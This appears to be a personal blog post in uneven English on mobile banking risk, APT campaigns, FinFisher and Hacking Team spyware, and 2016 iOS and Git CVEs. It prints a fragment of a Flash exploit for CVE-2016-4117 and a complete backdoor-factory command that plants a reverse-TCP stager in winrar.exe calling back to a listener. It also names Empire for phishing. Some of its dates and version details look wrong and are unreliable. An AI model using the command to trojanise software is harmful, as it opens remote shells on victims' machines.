When you pick up your mobile phone daily, no one will be care of your data privacy in highest priority. Since you are busy with your social media apps (Whatapps, Facebook, Instagram..etc). As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. Yes, this is not a hot news. My friend believed that his phone is secure since he installed anti-virus program. As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. May be you feel that it is not a critical issue once anti-virus program installed. From technical point of view, it looks correct because anti-virus will monitor malicious activities and quarantine the suspicious activities.

As a general user point of view, we all trusted the mobile financial apps issued by Bank. Do you think it was enough that install a virus protection software and do the mobile patch management. It will resolve all the problems. Regarding to this question, below table can provide an overall idea in this regard. It looks that some component had their own fundamental design limitation.

Compare with traditional non visualization computer architecture, smart-phone memory resources usage brings security concerns to subject matter expert. Apart from this, MIDP (mobile information device profile) carry out trusted relationship concerns of mobile phone applications.

It looks that tons of security concerns carry out on mobile finance software application. But what is the factors let financial institution keep going to this path but don’t take a U turn?

This questions looks everybody can answer? We are living on the earth and it is a demanding atmosphere. The traditional retail banking environment can’t survival on traditional banking product. Besides, labor cost, shop rental fees are count in bankers mind. The bankers think e-business can give assistance. And therefore a electonic technology similar as flooding to change the traditional world was born.

Information security value?

A joke told us that business man did not have key term information security in their mind until tragedy happen. As times goes by, mobile banking technology become a main trend today. Even though a small shop in village from China also accept mobile payment. But what is the value of information security no one can answer today especially bankers! Because if someone put information security on top priority means the efficiency of business developement will slow down. But who have guts to carry this burden ask the management board return to twenty years ago technology?

What is the possibility or hit rate on malware infect mobile phone?

A technology term bring your own device (BYOD) means you are the owner of the device. If an cyber incident occurs on your phone, it is really a sophisticate scenario. As we know, mobile phone system architecture operate on top of virtual machine environment. For sure that the web browsing activities on your mobile phone more intensive compare to your home workstation. Since it is a mobile device, your mobile phone will able to access mobile hot spots anywhere. It increase the attack surface for hackers execute the attack.

What if your mobile phone infected by malware? Do you think it will harmful to bank system?

If you are my follower, do you remember that we had discussion on malware infection technique last year. A critical malware incident occured in U.S. weapons manufacturer Lockheed Martin Corp on 2011. Hackers infiltrated to their internal network.This incident driven Lockheed Martin develop kill chain framework. The goal of this framework is going to defense malware activities. Below table is the famous framework of Lockheed Martin Kill Chain.

Refer to above table, disrupt the malware infection process need deny in delivery phase. However the local anti-virus install on mobile phone do not have such capabilities. The mobile finance application provides flexibility to client. But it was not secure!

Under this context, can we say online banking will be secure than mobile finance apps install on mobile phone? As a matter of fact, a mobile finance applications install on mobile phone exploits programming syntax once phone compromised by hacker. It such a way assists hacker understand the finance institution back end process. Compare with online banking system, bank customers may vulnerable to man-in-the-middle causes privacy leakage. However the overall risk rating lower than mobile finance application software. At least hacker may have difficulties infiltrate to back-end system.

Cyber Crime Business Is Still Booming, especially Targeted attack trends. It is hard to tell what is the functionality on mobile finance application software in future. May become a electronic wallet. Since a design weakness has been known, who is the appropriate guy to metigate the on going strategy in future?

It is a long story, let’s discuss later!

We heard a technical terms named advanced persistent threat since 2013. An information which announced by cyber security company (kaspersky, FireEye, Symantec….etc) but not acknowledge by instigator . The story looks amazing that a security consulting firm (Mandiant) fooled by hacker. By coincidence, it found malicious finger print on gmail account and email message contained alleged resources came from China during investigation. This incident lets people in the world believe that cyber war will be happen in between country to country. A technical vocabulary so called Advanced Persistent Threat spreads around the world.

An unauthorized person gains access to a network and stays there undetected for a long period of time. Cyber security terminology so called APT attack. APT style attack confused security experts. Their mechanism contains many shadow nodes. The shadow nodes located in different areas and countries. It can take this advantage and convert as political tool. It is a sword. Careerist can blame another country that they are dishonest using internet. Who’s cast a unrighted wrong, believed that above diagram can provide an idea to you in this regard.

Reference: – Unofficial information which did not acknowledge by instigator

APT 1: cyber espionage group based in China – Discovered on Feb 2013

APT 28: Russia’s Cyber Espionage Operations – Discovered on Oct 2014

whistle blower (Snowden) – surveillance program scandal ( PRISM ) – Discover on Jan 2014

The design objective of Advanced persistent threat:

Enabled espionage using a variety of intelligence gathering techniques to access sensitive information.

Government enforcement official tools

i. Da Vinci and Galileo

Made by the Italian company Hacking Team, use to Hijack Phones for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data.

Remark: An Official announcement in 2015 near year end, Da Vinci products not going to export to other countries due to data leakage incident happened on their campus.

ii. FinFisher (Neodymium & Promethium)

Specific users targeted in Europe and Turkey (last update on Dec 2016)

Neodymium uses the W32/Wingbird.A!dha backdoor to spy on users.

Promethium is a a “backdoor” program, it is a malware. He will masquerades as popular Windows tools such as WinUtils, TrueCrypt, WinRAR and SanDisk.

Remark: CVE-2016-4117 confusion code bug in Adobe Flash equivalent a instigator with Neodymium and Promethium. The Adobe Flash bug allow corrupt one of the objects to extend its length to 0xffffffff (see below source code) and its data buffer to address 0. The attacker are allow to access all of the user space memory once ByteArray corrupted. And such a way attacker execute embedded shellcode. If the Flash Player version is older than 21.0.0.196, the attack can’t execute.

public static function flash20(ba:Dtaa3, var4:uint, var5:uint)
{
   var len:uint;
   var flash50:uint;
   try
   {
       flash38 = true;
       flash21 = ba;
       len = ba.length;
       flash50 = (ba.a1 ^ ba.a5);
       ba.a2 = 0xFFFFFFFF;
       ba.a6 = (0XFFFFFFFF ^ flash50);
       ba.endian = Endian.LITTLE_ENDIAN;
       flash39 = var5;
       len = ba.length;
       if (len !=0xFFFFFFFF)
       {
           flash3("");
       };
       if (flash72)
       {
           Play3.flash20(); // Win32.Exec()
        }
       else
       {
           flash1("");
        };
        flash34(var5, var4);
        }

Advanced Persistent Threat – Drawback of remote monitoring

Traditional Lawful Interception solutions face new challenges which highlight by Finfisher (see below)

• Data not transmitted over any network
• Encrypted Communications
• Targets in foreign countries

Finfisher resolution:

FinSpy was installed on several computer systems inside internet Cafes in critical areas in order to monitor them for suspicious activity, especially Skype communications to foreign individuals. Using the Webcam, pictures of the targets were taken while they were using the system

Traditional tactical or strategic Interception solutions face challenges which point out by Finfisher (see below):

• Data not transmitted over any network and kept on the device
• Encrypted Communications in the Air-Interface, which
• avoid the usage of tactical active or passive Off-Air Systems
• End-to-end encryption from the device such as Messengers,
• Emails or PIN messages

Finfisher resolution:

FinSpy Mobile was deployed on BlackBerry mobile phones of several Targets to monitor all communications, including SMS/MMS, Email and BlackBerry Messenger.

The official spy tools looks powerful, however there is another sniff technique which available in the IT world.

Implant backdoor example:

Not going to teach how to hack the system but it is a better understanding …………..

This session not going to get in touch with FinFisher backdoor. However few available solution in the market guide you implant a backdoor to Winrar.exe. One of the example display as below:

sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s iat_reverse_tcp_stager_threaded -H 192.168.50.15 -P 8080

Government enforcement agency looks not difficult to expand the APT area of coverage. A lot of time they are relies on phishing.

Concept wise equivalent to government enforcement tool

The objective of the APT intend to collect sensitive data or voice messages during surveillance program process. And therefore the compatibility of the malware become an important factor. We are not a government agency but we can run a test with similar concept of design.

Phishing with Empire – Empire software supports macOS, Linux, and Windows hosts from one listener. The only requirement is that you need find a Command and Control (C2) work with you.

Summary:

The key words advanced persistence threat sound scary however it is only a surveillance program. As a normal citizen I do not believe foreign country have interest on my telephone conversation. From data privacy, it looks that it contained grey area since we do not know the reason why we are under surveillance. Such action let people nervous. However my expectation on these technology is that it must expand to some area in the city which take care the monitor and control of criminal activities. What do you think?

Keep heard that vulnerability found on Android phone recently. For instance Dirty Cow attack, Drammer attack and Dangerous Pork Explosion backdoor. Do you think Linux operating system not secure anymore?

As far as I remember vulnerabilities found on Apple IOS not less than Android operation system. Can you imagine in what circumstance, XNU (X is Not Unix) can be compromised by hacker. iPhone architecture and its main components. The architecture uses the Darwin operating system, which includes the XNU kernel and system utilities.

What is XNU?

Darwin is an open source operating system released by Apple in 2000. Apple then built upon Darwin to create OS X and iOS. XNU is the computer operating system kernel developed at Apple Inc for use in OS X and iOS. XNU was a hybrid kernel combining version 2.5 of the Mach kernel developed. The components from 4.3BSD and an Objective-C API for writing drivers called Driver Kit. Up to 2016 iOS version details shown as below:

iOS has many similarities as Mac OSX on kernel components and functions. As mentioned, XNU was a hybrid kernel combining version 2.5 of the Mach kernel developed. In the kernel there are three important components. They are Mach, BSD and IOKit.

•    Mach: Low level abstraction of kernel
•    BSD: High level abstraction of kernel
•    IOKit: Apple kernel extension framework

All the classes have a root object, called OS Object. OS Object mainly overwrite new operator to allocate memory, and declare init method to initialize the object self. Because of this fundamental design, few known vulnerabilities are happened in this area. An application may be able to execute arbitrary code with kernel privileges. Do you think iPhone is invulnerability? No, sure properly not. Found high level of risk vulnerabilities last few month (2016). Seems headline news not intent broadcast in high profile and therefore not to seriously shocks iPhone fans. For more details, please see below CVE for references:

• CVE-2016-4778: The kernel in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.

Remark: Impact – An application may be able to execute arbitrary code with kernel privileges

• CVE-2016-4777: The kernel in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (invalid pointer dereference) via a crafted app.

Remark: Impact – An application may be able to execute arbitrary code with kernel privileges

• CVE-2016-4738: libxslt in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

Remark: Impact – Processing maliciously crafted web content may lead to arbitrary code execution

Xcode is a development environment which contains a suite of software development tools for the creation of OS X, iOS, WatchOS and tvOS software

• CVE-2016-2315: revision.c in git before 2.7.4 uses an incorrect integer data type, which allows remote attackers to execute arbitrary code via a (1) long filename or (2) many nested trees, leading to a heap-based buffer overflow.
• CVE-2016-2324: Integer overflow in Git before 2.7.4 allows remote attackers to execute arbitrary code via a (1) long filename or (2) many nested trees, which triggers a heap-based buffer overflow

Current summary:

Due to business requirement, life cycle of products become short and such a way shorten product development life cycle & test cycle. It is a joke!